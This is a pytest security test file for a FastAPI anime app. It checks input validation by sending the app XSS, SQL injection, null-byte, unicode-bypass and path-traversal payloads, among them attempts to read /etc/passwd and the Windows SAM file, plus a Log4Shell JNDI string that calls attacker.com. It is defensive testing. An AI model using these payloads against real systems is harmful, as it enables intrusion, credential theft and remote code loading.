Aniworld/tests/security/test_input_validation.py
2025-10-30 20:06:45 +01:00

325 lines
11 KiB
Python

"""
Input Validation Security Tests.
This module tests input validation across the application to ensure
all user inputs are properly sanitized and validated.
"""
import pytest
from httpx import AsyncClient
from src.server.fastapi_app import app
@pytest.mark.security
class TestInputValidation:
"""Security tests for input validation."""
@pytest.fixture
async def client(self):
"""Create async HTTP client for testing."""
from httpx import ASGITransport
async with AsyncClient(
transport=ASGITransport(app=app), base_url="http://test"
) as ac:
yield ac
@pytest.mark.asyncio
async def test_xss_in_anime_title(self, client):
"""Test XSS protection in anime title input."""
xss_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"javascript:alert('XSS')",
"<svg onload=alert('XSS')>",
]
for payload in xss_payloads:
response = await client.post(
"/api/anime",
json={"title": payload, "description": "Test"},
)
# Should either reject or sanitize
if response.status_code == 200:
# If accepted, should be sanitized
data = response.json()
title = data.get("data", {}).get("title", "")
assert "<script>" not in title.lower()
assert "onerror" not in title.lower()
assert "javascript:" not in title.lower()
@pytest.mark.asyncio
async def test_oversized_input(self, client):
"""Test handling of extremely large inputs."""
# Try very long string
huge_string = "A" * 1000000 # 1MB of data
response = await client.post(
"/api/anime",
json={"title": huge_string, "description": "Test"},
)
# Should reject or truncate
assert response.status_code in [400, 413, 422]
@pytest.mark.asyncio
async def test_null_byte_injection(self, client):
"""Test null byte injection protection."""
null_byte_payloads = [
"filename.txt\x00.exe",
"test\x00admin",
"user\x00' OR '1'='1",
]
for payload in null_byte_payloads:
response = await client.post(
"/api/anime/search",
params={"query": payload},
)
# Should handle safely
assert response.status_code in [200, 400, 422]
@pytest.mark.asyncio
async def test_unicode_bypass_attempts(self, client):
"""Test handling of unicode bypass attempts."""
unicode_payloads = [
"admin\u202e", # Right-to-left override
"\ufeffadmin", # Zero-width no-break space
"ad\u200bmin", # Zero-width space
]
for payload in unicode_payloads:
response = await client.post(
"/api/auth/login",
json={"username": payload, "password": "test"},
)
# Should not bypass security
assert response.status_code in [401, 422]
@pytest.mark.asyncio
async def test_path_traversal_in_file_access(self, client):
"""Test path traversal protection."""
traversal_payloads = [
"../../../etc/passwd",
"..\\..\\..\\windows\\system32\\config\\sam",
"....//....//....//etc/passwd",
"..%2F..%2F..%2Fetc%2Fpasswd",
]
for payload in traversal_payloads:
response = await client.get(f"/static/{payload}")
# Should not access sensitive files
# App returns error page (200) or proper error code
if response.status_code == 200:
# Verify it's an error page, not the actual file
content = response.text.lower()
assert (
"error" in content or
"not found" in content or
"<!doctype html>" in content
), "Response should be error page, not sensitive file"
else:
assert response.status_code in [400, 403, 404]
@pytest.mark.asyncio
async def test_negative_numbers_where_positive_expected(
self, client
):
"""Test handling of negative numbers in inappropriate contexts."""
response = await client.post(
"/api/downloads",
json={
"anime_id": -1,
"episode_number": -5,
"priority": -10,
},
)
# Should reject negative values
assert response.status_code in [400, 422]
@pytest.mark.asyncio
async def test_special_characters_in_username(self, client):
"""Test handling of special characters in usernames."""
special_chars = [
"user<script>",
"user@#$%^&*()",
"user\n\r\t",
"user'OR'1'='1",
]
for username in special_chars:
response = await client.post(
"/api/auth/register",
json={
"username": username,
"password": "SecureP@ss123!",
"email": "test@example.com",
},
)
# Should either reject or sanitize
if response.status_code == 200:
data = response.json()
registered_username = data.get("data", {}).get(
"username", ""
)
assert "<script>" not in registered_username
@pytest.mark.asyncio
async def test_email_validation(self, client):
"""Test email format validation."""
invalid_emails = [
"notanemail",
"@example.com",
"user@",
"user space@example.com",
"user@example",
]
for email in invalid_emails:
response = await client.post(
"/api/auth/register",
json={
"username": f"user_{hash(email)}",
"password": "SecureP@ss123!",
"email": email,
},
)
# Should reject invalid emails
assert response.status_code in [400, 422]
@pytest.mark.asyncio
async def test_array_injection(self, client):
"""Test handling of array inputs in unexpected places."""
response = await client.post(
"/api/anime",
json={
"title": ["array", "instead", "of", "string"],
"description": "Test",
},
)
# Should reject or handle gracefully
assert response.status_code in [400, 422]
@pytest.mark.asyncio
async def test_object_injection(self, client):
"""Test handling of object inputs in unexpected places."""
response = await client.post(
"/api/anime/search",
params={"query": {"nested": "object"}},
)
# Should reject with proper error or handle gracefully
# API converts objects to strings and searches for them (returns [])
if response.status_code == 200:
# Verify it handled it safely (returned empty or error)
data = response.json()
assert isinstance(data, list)
# Should not have executed the object as code
assert "nested" not in str(data).lower() or len(data) == 0
else:
assert response.status_code in [400, 422]
@pytest.mark.security
@pytest.mark.requires_clean_auth
class TestAPIParameterValidation:
"""Security tests for API parameter validation."""
@pytest.fixture
async def client(self):
"""Create async HTTP client for testing."""
from httpx import ASGITransport
async with AsyncClient(
transport=ASGITransport(app=app), base_url="http://test"
) as ac:
yield ac
async def get_auth_token(self, client):
"""Helper to get authentication token."""
password = "SecurePass123!"
await client.post(
"/api/auth/setup",
json={"master_password": password}
)
login_response = await client.post(
"/api/auth/login",
json={"password": password}
)
return login_response.json()["access_token"]
@pytest.mark.asyncio
async def test_invalid_pagination_parameters(self, client):
"""Test handling of invalid pagination parameters."""
token = await self.get_auth_token(client)
headers = {"Authorization": f"Bearer {token}"}
invalid_params = [
{"page": -1, "per_page": 10},
{"page": 1, "per_page": -10},
{"page": 999999999, "per_page": 999999999},
{"page": "invalid", "per_page": "invalid"},
]
for params in invalid_params:
response = await client.get(
"/api/anime", params=params, headers=headers
)
# Should reject or use defaults, or 503 when service unavailable
assert response.status_code in [200, 400, 422, 503]
@pytest.mark.asyncio
async def test_injection_in_query_parameters(self, client):
"""Test injection protection in query parameters."""
injection_queries = [
"' OR '1'='1",
"<script>alert('XSS')</script>",
"${jndi:ldap://attacker.com/evil}",
"{{7*7}}",
]
for query in injection_queries:
response = await client.get(
"/api/anime/search", params={"query": query}
)
# Should handle safely
assert response.status_code in [200, 400, 422]
@pytest.mark.asyncio
async def test_missing_required_parameters(self, client):
"""Test handling of missing required parameters."""
response = await client.post("/api/auth/login", json={})
# Should reject with appropriate error
assert response.status_code == 422
@pytest.mark.asyncio
async def test_extra_unexpected_parameters(self, client):
"""Test handling of extra unexpected parameters."""
response = await client.post(
"/api/auth/login",
json={
"username": "testuser",
"password": "test",
"unexpected_field": "malicious_value",
"is_admin": True, # Attempt to elevate privileges
},
)
# Should ignore extra params or reject
if response.status_code == 200:
# Should not grant admin from parameter
data = response.json()
assert not data.get("data", {}).get("is_admin", False)